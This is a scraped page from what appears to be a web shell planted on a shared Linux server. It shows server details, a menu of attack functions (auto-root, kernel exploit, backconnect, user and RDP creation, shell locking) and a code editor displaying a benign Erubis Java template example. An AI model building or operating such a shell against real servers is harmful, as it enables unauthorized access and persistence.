Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
ruby-erubis /
examples /
basic /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
1.49
KB
-rw-r--r--
example.ec
810
B
-rw-r--r--
example.ecpp
510
B
-rw-r--r--
example.ejava
1.01
KB
-rw-r--r--
example.ejs
340
B
-rw-r--r--
example.eperl
324
B
-rw-r--r--
example.ephp
344
B
-rw-r--r--
example.eruby
311
B
-rw-r--r--
example.escheme
405
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : example.ejava
<% import java.util.*; public class example { public static void main(String[] args) { String user = "Erubis"; String[] list = { "<aaa>", "b&b", "\"ccc\"" }; StringBuffer _buf = new StringBuffer(); %> <p>Hello <%== user %>!</p> <table> <tbody> <% for (int i = 0; i < list.length; i++) { %> <tr bgcolor="<%= i % 2 == 0 ? "#FFCCCC" : "#CCCCFF" %>"> <td><%= i + 1 %></td> <td><%== list[i] %></td> </tr> <% } %> </tbody> </table> <% System.out.print(_buf.toString()); } public static String escape(String s) { StringBuffer sb = new StringBuffer(); for (int i = 0; i < s.length(); i++) { char ch = s.charAt(i); switch (ch) { case '<': sb.append("<"); break; case '>': sb.append(">"); break; case '&': sb.append("&"); break; case '"': sb.append("""); break; default: sb.append(ch); } } return sb.toString(); } public static String escape(int i) { return Integer.toString(i); } } %>
Close